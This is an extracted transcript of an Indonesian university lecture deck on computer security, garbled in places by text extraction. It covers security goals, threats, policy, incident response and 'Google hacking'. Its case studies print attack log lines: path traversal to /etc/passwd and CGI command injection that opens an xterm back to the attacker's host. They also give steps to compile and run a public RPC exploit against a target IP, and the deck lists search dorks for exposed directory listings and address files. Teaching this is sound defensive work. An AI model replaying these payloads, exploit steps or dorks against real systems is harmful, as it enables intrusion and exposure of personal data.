KSK Class1 - Overview and Google Hacking
-
Upload
akbarkhalif -
Category
Documents
-
view
157 -
download
7
Transcript of KSK Class1 - Overview and Google Hacking
Keamanan Sistem KomputerKeamanan Sistem KomputerComputer Security
RUDI LUMANTO
UNIVERSITAS BUDILUHURUNIVERSITAS BUDILUHUR
RUDI LUMANTOUNIVERSITAS BUDILUHURSemester Genap 2008/2009
Referensi dan Kontak InfoMatt Bishop, “Computer Security : Art and Science”, Addison-Wesley 2003, 1084 pages.Deborah Russel, G.T Gangemi Sr, “COMPUTER SECURITY BASIC”, ,O’Reilly & AssociatesJohn E Caravan, “FUNDAMENTALS OF NETWORK SECURITY” Artech HouseNETWORK SECURITY , Artech Houseinternet
KONTAK : RUDI [email protected]
0815-1036-9754
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
0815 1036 9754Universitas BudiluhurSABTU 13:15- 15:45
KRITERIA PENILAIANKRITERIA PENILAIAN
TUGAS (2-4 report) : 10%UJIAN TENGAH SEMESTER : 40%UJIAN TENGAH SEMESTER : 40%ABSENSI KEHADIRAN : 10 %UJIAN AKHIR SEMESTER 40%UJIAN AKHIR SEMESTER : 40%
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
DAFTAR SILABUSDAFTAR SILABUS
Overview / Pengenalan Keamanan Sistem KomputerKeamanan Operating Sistem/SoftwareKeamanan Fisik/HardwareKeamanan Jaringan/InternetAncaman Software : virus, worm dll,Ancaman Internet : Serangan TCP, DNS, Dos dll
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
DAFTAR SILABUSDAFTAR SILABUS
FirewallIntrusion Detection System (IDS)y ( )Mengenal CryptographyAplikasi Cr ptographAplikasi CryptographySkema KerberosVPNAnalisa kebocoran
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
KEAMANAN SISTEM KOMPUTERKOMPUTER
OVERVIEW
Keamanan Software
KeamananHardware
Keamanan Jaringan
Ancaman Sofware : Ancaman Internet : TCP Virus, Worm dll Attack, DOS, DNS dll
Firewall
Basic CryptographyBasic Cryptography
Aplikasi Cryptography
Skema Kerberos
VPN
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Analisa Kebocoran
KEAMANAN SISTEM KOMPUTERKEAMANAN SISTEM KOMPUTER
1. OVERVIEW
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
outlineoutline
Why Computer Security ?Computer Security Goals.p yThreats, Vulnerabilities, AttacksPolic and meas rePolicy and measureSimple cases and toolsMaking a good security policy
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Why Computer SecurityWhy Computer Security
T t t /i di id l tTo protect company/individual assets– Hardware, software and INFORMATION (data, ability
and Reputation)and Reputation)
To gain a competitive advantage– How many people will use a bank’s internet banking y p p g
system if they knew that the system had been hacked in the past ?
l i h l iTo comply with regulatory requirements To keep your job
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Computer Security GoalsComputer Security GoalsC onfidentialityC onfidentialityI ntegrity
A il bilitA vailability
Confidentiality : Prevention of unauthorized access to data, and accidental dataConfidentiality : Prevention of unauthorized access to data, and accidental data disclosures
Integrity : Prevention of improper modifications of the data, either intentionally or accidentally. 1) Modification of the data by unauthorized parties. 2) O ti d t b th i d l i th t i i tibl2) Operation on data by authorized personnel in ways that is incompatible with the nature (syntax) of the data, leading to its corruption.3) Any modification to append-only records, to alter their evidence value.
Availability : Measures to protect data should not result in making it cumbersome
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
y p gto access and modify the data in ways in which it was intended.
Threats,vulnerabilities and Attacks
Anything that can disrupt the operationTHREATS
Anything that can disrupt the operation, functioning, integrity or availability of computer systemcomputer system.
Stand alone threats– Threat arise without any connection to other system, Ex:
virus password crackervirus, password cracker
Connection threats– Threat arise because of connection to other system
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
◆Threats Arising from Connection to the other computers
Information leaks •• A database of customer information, including credit card numbers is leaked from an Internet service provider
Falsification
numbers, is leaked from an Internet service provider.
•• The contents of the web site of a public institution are rewritten with the political messages of a dissident group.
Denial of services
rewritten with the political messages of a dissident group.
•• A bookshop site is attacked and its server goes down, discontinuing service.
Impersonation
d sco t u g se ce
•• An intruder fakes a membership site for the purchase of merchandise.
Attack platform •• A corporate network administering a server used as a platform for attacking other sites was sued for compensation for the
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
damage caused.
VulnerabilitiesWeakness in the design, configuration or
implementation of a computer system thatimplementation of a computer system that renders it susceptible to a threat.
1. POOR DESIGN Hardware and software system that contain design flaws that can beexploited Ex: sendmail flaws in early version of unix that allowedexploited. Ex: sendmail flaws in early version of unix that allowed hackers to gain privileged root access
2. POOR IMPLEMENTATIONSystem that incorrectly configured because of in-experience insufficientSystem that incorrectly configured because of in-experience, insufficienttraining or sloppy work. Ex: a system that does not have restricted access Privileged on critical executable file.
3. POOR MANAGEMENT
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Inadequate procedures and insufficient checks and balances. Ex: No documentation and monitoring
Critical Vulnerabilities and Vulnerability Scanning
Certain security vulnerabilities are declared critical when they are (or are about to) being actively exploited and represent a clear and present dangerUpon notification of a critical vulnerability, systems must be patched by a given date or y p y gthey will be blocked from network access
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
◆Types of Vulnerability
OS/Program name Cause InfluenceIndex Server ( WindowsNT)Index Service (Windows2000)
ISAPI extension idq.dll overflow
Local system permission seized by an outsider
telnetd (FreeeBSD 4.3 and Buffer overflow during AYT Telnetd permission (normally (earlier, Red Hat 7.1 and earlier, etc.)
goptional packet processing
p ( yroot) seized by an outsider
sadmind (Solaris2.3 – 7) Buffer overflow during NETMGT_PROC_SERVICE
Command executable with root permission by an outsider
request processingSSH 1.2.31 OpenSSH 2.2 and earlier
Overflow in an int variable in detect_attack function
Command executable with root permission by an outsider
dtspcd (AIX 4.3/5.1, HP-UX Buffer overflow in a shared Arbitrary command p (11.11, Solaris 8, etc.) library
yexecutable with root permission by an outsider
Bind8.2x(Red Hat, Turbolinux, Solaris, AIX , etc.)
Buffer overflow during TSIG processing
Operation permission (normally root) seized by an outsider
wu-ftpd 2.6.0 and earlier (Red Hat linux 6.2 and earlier, etc.)
Format string bug in site-exec and setproctitle functions
Execution permission (normally root) seized by an outsider
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
IIS4.0 (WIndowsNT)IIS5.0 (Windows2000)
Access to a file outside root directory permitted when path name is UNICODE
Shell command executed with IUSR_Machinename permission by an outsider
ATTACKSA specific technique used to exploit a vulnerabilty.Ex: a threat could be a denial of service, a vulnerability, y
is in the design of OS, and an attack could be a “ping of death”
Passive attacksPassive attacks– Gathering information by monitoring and recording
traffic on the network, or by social engineering. Ex: packet sniffing traffic analysispacket sniffing, traffic analysis
Active attacks– Overt actions on the computer system
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Overt actions on the computer system.
◆Denial of ServiceService downedTarget host Service downed due to overloadTarget host
• Large volume data
Attack platform
• Large volume data
• Packets causinga system down
Start attack!!
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Policy and MeasurePolicy and MeasureSecurity Trinity : foundation for all security policies and measures that an organization develops and deployg p p y
What is Security ?Definitions from the Amer.Herit.Dic : - Freedom from risk or danger:safety
Measures adopted To preventSecurity
Prevention
- Measures adopted …. To prevent a crime.
Computer Security Measures-Mechanisms to prevent, detect and recover from threats and attacks orfor auditing purposes.
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Key pointComputer Security is not only a technical
problem it is a business and peopleproblem, it is a business and people problem.
Th t h l i th t th diffi ltThe technology is the easy part, the difficult part is developing a security policies/plan th t fit th i ti ’ b ithat fits the organization’s business operation and getting people to comply with th lthe plan.
Social engineering : non-technical methods hackers employ to gain access to
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
g g p y gsystem, refers to the process of convincing a person to reveal information
Security operations
-Prevention againts accidental capture or modification ofg pinformation
-Detection of all improper access to data and system resources
R-Recovery from unauthorized access, restoring data values, system integrity etc
Policies and ProceduresU i il d-User privileged-Data backup
-Security tools to deploy-Monitoring the integrity
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Monitoring the integrity-Response to Incident
-User role, etc
◆Types of Users
Hacker A user who tries to obtain access using advanced knowledge g gand techniques.
Cracker A user who attempts sabotage and other subversive activities with malicious motives
Script kiddy A user who has little technical capability and uses tools available on the Internet when attempting cyber attacks
Corporate network
Intrusion, subversion, sabotage
Subversion, sabotageVulnerability
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
◆Integrity Check Tool
/etc/passwd file
dc577ef5f97b671781c04425737bc4df
#hash value (MD5)
File editing/falsification Mismatch ... Altered!!
b0ed782bbd4c8445f07538a3ede788eb
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
◆Security Tools and Security Products
Server/clientC t t kMalicious user
Malicious user
Server/clientCorporate network
Internet
• Router(Filtering)• Firewall(VPN)
• H-IDS• Log monitoring
Countermeasures against hacking
Network security Server security
Firewall(VPN)• N-IDS• Vulnerability audit
• Log monitoring• Falsification prevention• Vulnerability audit
against hacking
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
• Virus scan• Encryption
• Virus scan• Encryption(SSH)
Miscellaneous
◆Firewall?
I t tInternet Intranet
Public WWW server
① HTTP
Client Public FTP server
② HTTP
③ FTP
④ HTTP
⑤Unspecific AP
ClientServer
Authentication
P k t filt i
GW type firewall
• Packet filtering
• Application gateway
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
• Stateful inspection
◆Encryption VPN(Virtual Private Network)=Leased Linethe Internet e.g. IPsec IPv6
FW/VPN
Remote access user
g
FW/VPN router
Provider A Provider C
Encrypted Encrypted communicationcommunication
Internet IX
Provider A Provider C
Provider BProvider D
FW/VPN router
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Response to Computer Security Incidents
Mandatory incident reporting;– Report all suspicious activity: ex :
• If urgent to Computer Helpdesk• Or to system manager (if immediately available);
i @f l• Non-urgent to [email protected];
– Incidents investigated by Computer Incident Response Team (CIRT);Response Team (CIRT);
– Not to be discussed!
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
CIRT (Computer Security Incident Response Team)
Security experts drawn from throughout the labInvestigate (“triage”) initial reports;Coordinate investigation overall;Work with local system managers;Call in technical experts;May take control of affected systems;y y ;Maintain confidentiality;
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Other Rules for General Systems
Warning system;– First time warning, repeat offense disciplinary action;
Unauthorized or malicious actions;Unauthorized or malicious actions;– Damage of data, unauthorized use of accounts, denial of service,
etc., are forbidden;Ethical behavior;Ethical behavior;– Same standards as for non-computer activities;
Restricted central services;M l b id d b C ti Di i i– May only be provided by Computing Division;
Security & cracker tools;– Possession (& use) must be authorized;
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
User roleUser role
Guard against malicious code in email– Don’t open attachments unless you are sure p y
they are safe– Don’t trust who email is from– Updated and enabled virus signatures
Guard against malicious code from web Gu d g s c ous code o webbrowsing
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
User role - 2User role - 2
Obey Strong Authentication Policy (Kerberos)– Don’t run network services (login or read write ftp) unless they
demand Kerberos authentication– Treat your kerberos password as a sacred object (never expose it
over the network)Promptly report potential computer security incidents– Ex : call by telephone or email to [email protected]
(if in US)– Follow CIRT instructions during incidents (especially about g ( p y
keeping infected machines off the network and preserving the status of an infected machine for expert investigation)
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Example of Policy IssuesExample of Policy Issues
Data backupIncidental usePrivacyOffensi e materialOffensive materialLicensing
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Data Backup Policy - UsersData Backup Policy - Users
– Users (data owners) responsible for determining:
• What data requires protection;• How destroyed data would be recovered, if needed;• Coordinating backup plan w/ sysadmins;• Coordinating backup plan w/ sysadmins;
– or doing their own backups;
• If the backup is done for you it might be worth p y goccasionally checking that you can really retrieve the data
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Privacy of Email and FilesPrivacy of Email and Files
May not use information in another person’s files seen incidental to any activity (legitimate or not) for any purpose w/o either explicit permission of the owner or a “reasonable belief the file was meant to be accessed by others.”– Whether or not group/world accessible;– “Group” files implicitly may be used by the
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
p p y y ygroup for the mission of the group;
A simple case and tool( seing the( seing the technique/informasition behind a case)
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
A Security Case
A company called “Acme-art. Inc” doing an online business in the internet. They have a database that record all customers information included their credit cardi f i d d h i i h d b fi llinformation and connected to their site www.acme-art.com that protected by firewall.31 October 2001 a hacker intrude to their system and stole all credit card information, Then put the information into newsgroup usenet. A few hour then the company has loss million dollars bad reputation and have to invest many more money to keep theirloss million dollars , bad reputation and have to invest many more money to keep their business alive.
What happen ? How it could be happen ?
The firewall is installed. And the internet access can Fact :
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
only be done through http port 80.
Security team investigation: Sample case 1
Looking for clues in log file…
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 345210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 846810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 691210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891
10 0 1 21 - - [31/Oct/2001:03:03:13 +0530] "GET /index cgi?page=falls shtml HTTP/1 0" 200 680
A
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] GET /index.cgi?page=falls.shtml HTTP/1.0 200 68010.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 5264010.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 65210.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580
B
C10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
C
D
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1 0" 200 1228
E
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
HTTP/1.0" 200 122810.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
F
Security team investigation: Sample case 1
Part A in log file
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 345210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 846810.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 691210.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891
Browsing …….g
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Security team investigation: Sample case 1
Part B in log file
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 68010.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 5264010.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 65210 0 1 21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel jpg HTTP/1 0" 200 36580
g
10.0.1.21 [31/Oct/2001:03:03:18 +0530] GET /tahoel.jpg HTTP/1.0 200 36580
Browsing …….
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Security team investigation: Sample case 1
l f lPart C in log file
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272[ / / ] / g / /
T i di tTrying direct access ….
Error response
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Security team investigation: Sample case 1
Part D in log fileg10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 300810.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358
Attacking …
SecurityHole
1
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Security team investigation: Sample case 1Perl script
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Security hole 1: validation form for parameter variable will be transfer to index.cgi script
Security team investigation: Sample case 1
Part E in log filePart E in log file10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358
Attacking …
SecurityHole
1
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Recovering passwd file
Security team investigation: Sample case 1
Passwd filePasswd file
root:x:0:0:root:/root:/bin/bash………………Lion:x:500:500::/home/lion:/bin/bash
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Security hole 1 effect: recovering important “passwd” files
Security team investigation: Sample case 1
Part F in log file10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 122810.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
Attacking …
SecurityHole
2
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Direct execution to server commands
Security team investigation: Sample case 1
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+- display+10.0.1.21:0.0[ / / ] / g p g | p y+%26| HTTP/1.0" 200 1228
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Information/technique behind the case
Information about targetHTTP Structure CGI/PERL LINUX s tem and its commandLINUX sytem and its command
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Httpd file default structures what is the web site structure ?
Lisv01
/(root)
h bi bi dhome var sbin bin dev etc usr …
u01 u02 u03 … www httpd init.dlog
public_html html conf (default user’s directory) (default document root) httpd
httpd
httpd.conf
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
*Document root : The directory that holds HTML documents.* : file
11
WWW server
Client-side application
Behind the Web
WWW server
WWW browser
Internet/Intranet
WWW server software
HTML&Intranet server_software Script
Execute application
N t k l di li ti
JAVA SCRIPT
WWW server software A li ti
WWW serverNetwork-loading application
WWW browser
Internet/I t t
WWWブラウザ
server_softwareApplication
Application
S id li ti
Intranet
Execute applicationJAVA Applet,Active X
WWW server
WWW Server
Server-side application
WWW browser
Internet/
Active X
CG
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
ApplicationServer_software
Internet/Intranet
Execute application
CGI,Active Server Pages
S 2Sampe case 2
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Sample case 2
After a period of new reqruitment,a server in a company suddenly crash down. Company network become unavailable for a while and it led to the much loss in production.a while and it led to the much loss in production.
What happen ?What happen ? How it could be happen ?
No Log files indication !!!
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Security team investigation: Looking for clues by social engineering
O l i ll h i d 2000 i hi d
Sample case 2
One new employee install the windows 2000 server in his computer and connect tothe LAN with global IP address.
Other Clues : 1. Nessus report on vulnerabilies in windows 20002. exploit program available
Analysis of Host
Nessus report on
Address of Host Port/Service Issue regarding port
192.168.27.31 ftp (21/tcp) Security hole found
192.168.27.31 smtp(25/tcp) Security hole foundpWindows 2000 serverafter IIS installation
192.168.27.31 http (21/tcp) Security hole found
192.168.27.31 nntp (119/tcp) Security hole found
192.168.27.31 msrpc(135/tcp) Security hole found
192.168.27.31 Netbios-ssn (139/tcp) Security not found
192.168.27.31 https (443/tcp) Security not found
192.168.27.31 Microsoft-ds (445/tcp) Security hole found
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
…… …. ….
…… …. ….
NESSUS report in detail
Sample case 2
Other references: IAVA:2003-A-0012
NESSUS report in detail
NESSUS ID:11835
Vulnerability msprc(135/tcp) The remote host is running a version of windows which has a flaw in its RPC interface which may allow an attacker to execute arbitrary code y yand gain SYSTEM privileges. There is at least one WORM which is currently exploiting this vulnerability. Namely, the MsBlaster worm.
Solution : see http://www.microsoft.com/technet/security/bulletin/MS03-026.mspxRisk factor: highCVE:CAN-2003-0352BID:8205Other referemces: IAVA:2003-A-0011NESSUS ID: 11806
Warning msprc(135/tcp) Distributed Computing Environment (DCE) services running on the remote host
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
remote host
NESSUS ID : Identity Number of Vulnerability Check by NESSUSBID : Buqtraq ID : related documentation regarding the vulnerability including
Sample case 2
BID : Buqtraq ID : related documentation regarding the vulnerability including exploit code , see: security focus site
simulation
1. Downloading the exploit code source file (from security focus site or Whoppix CD)$cp /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c
simulation
p p p y2. Compiling source file
$gcc oc192-dom.c3. executing the exploit into the IP target machine
$a out d 192 168 94 204$a.out -d 192.168.94.204
Get the system access
C:>WINNT\SYSTEM32\
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Information/technique behind the case
-Insufficient security orientation for new employee-Lack of knowledge about OSTh i l l it d i th i t t-There is always exploit code in the internet
-Lack of information about update
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Sampe case 3Sampe case 3
what kind of security techniques behind ?techniques behind ?
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
The warrior of the NET
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Making a good securityg g ypolicy
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Making a good security policyMaking a good security policy
Penetration Test/Ethical Hacking– Understanding what is inside the hackers g
mindSecurity Trinityy ySecurity Goals
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Definition of "Ethical Hacking“
A thi l h ki i h t d t k t hAn ethical hacking is where a computer and network expert who attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system ethical hacking uses the same methods as their lesssystem, ethical hacking uses the same methods as their less principled counterparts, but report problems instead of taking advantage of them. Ethical hacking is also known as penetration testing intrusion testing and red teaming Individuals involved intesting, intrusion testing, and red teaming. Individuals involved in ethical hacking is sometimes called a white hat, a term that comes from old Western movies, where the "good guy" wore a white hat and the "bad guy" wore a black hat. g yOne of the first examples of ethical hacking at work was in the 1970s, when the United States government used groups of experts called red teams to hack its own computer systems. According to Ed Skoudis, Vice President of Security Strategy for Predictive Systems' Global Integrity consulting practice, ethical hacking has continued to grow in an otherwise lackluster IT industry, and is becoming i i l t id th t d t h l
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
increasingly common outside the government and technology sectors where it began. Many large companies, such as IBM, maintain employee teams of ethical hackers.
Inside the Hackers MindS f ll k d S
Focus on the target- Successfully attack and Save -
Never use your own informationNever leave your footstepy pCan ever back again
HACKERS PROCEDURE
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Hackers Procedure/stepHackers Procedure/stepTargetingScanningRemote Attack 1. Information gathering
Local AttackLog removing / deception
2. Attack, intrusion
3. Unauthorized actLog removing / deceptionSpace usingTime stamp
4. Actions taken after unauthorized act
Time stamp Back door
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Example of Targeting
All Informations about the target
Technique name : Web browser targetingGoals : personal information about the targetOperation base any web browser with search engine siteOperation base - any web browser with search engine site
(google)- online database (WHOIS, IP-CONVERSION,etc)
Location, related company/organization, news, telephone number,Contact (mail address), web author idea/though,/behaviour, site software
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Targeting with google
By using the basic search techniques combined y g qwith Google's advanced operators, anyone can perform information-gathering and p g gvulnerability-searching using Google. This technique is commonly referred to as Google q y ghacking.
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Google hacking
Mastering google using its standard optionsg g g g p– Double quotation ….to be recognized a keyword as a phrase
– Hyphen (-) …. If you want to exclude words contain keyword
i– site: …. searching only inside the site– * …. wildcard. Use with double quotation to find any
indicate word
– Intitle: …. search limited only to web title– Inurl: …. search limited only to web page URL
I t t h li it d l t i f th– Intext: …. search limited only to main page of the web
– Filetype: …. search focusing on extention type of
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
file– Phonebook: …. search telephone number
Google hackingMastering google using its optionsMastering google using its options– site: …. searching only inside the site
“hacker” site:www.cnn.com or site:www.cnn.com hacker
This query searches for the word hacker, restricting the search to therestricting the search to the http://www.cnn.comweb site. How many pages on the CNN web server contain the word hacker
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Google hackingMastering google using its options– * …. wildcard. Use with double quotation to find any indicate word
“He is a * Hacker”
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Google hackingMastering google using its standard optionsaste g goog e us g ts sta da d opt o s– intitle: …. search limited only to web title
intitle: “Hacker”
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Google hackingMastering google using its standard optionsMastering google using its standard options– Inurl: …. search limited only to web page URL
inurl: www.securityfocus.com
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Google hackingMastering google using its standard optionsg g g g p– intext: …. search limited only to main page of the web
intext: “earthquake”
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Google hackingMastering google using its standard optionsg g g g p– Filetype: …. search focusing on extention type of file
“hacking” filetype:ppt" h i " fil i"whoppix" filetype:iso
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Google hackingMastering google using its standard optionsg g g g p– Phonebook: …. search telephone number
phonebook: John Doe CA
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Searching the site inside (that actually) not explore to publicSearching the site inside (that actually) not explore to public
More on Google hacking
Searching the site inside (that actually) not explore to publicSearching the site inside (that actually) not explore to public
Finding on server directory listingDirectory listings provide a list of files and directories in a browser window instead of the typical text-and graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering
Most directory listings begin with the phrase Index of which also shows in the title AnIndex of, which also shows in the title. An obvious query to find this type of page might be
intitle:index.ofwhich may find pages with the term index of in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Index of Native American Resources on the InternetLibDex—Worldwide index of library cataloguesIowa State Entomology Index of Internet Resources
More on Google hacking
C bi i l i i
Several alternate queries that provide more accurate results:
Combination google options on queries
q pintitle:index.of "parent directory" intitle:index.of name size These queries indeed provide directory listings by not only focusing on index of in the title but on keywords often foundfocusing on index.of in the title, but on keywords often found inside directory listings, such as parent directory, name, and size. Obviously, this search can be combined with other searches
fi d fil f di i l d i di li ito find files of directories located in directory listings.
Example:pName Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ intitle:bbs
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
bbs.dat inurl:"Index of" intitle:“Index of“
Example:Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data"
More on Google hacking
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Example:Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data“ intitle:bbs
More on Google hacking
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Example:bbs.dat inurl:"Index of" intitle:“Index of“
More on Google hacking
RUDI LUMANTO UNIVERSITAS BUDILUHUR , Semester Genap 2008/2009
Example: searching database of address people written in csv focusing to japan sitefiletype:csv address site:jp
More on Google hacking
yp jp
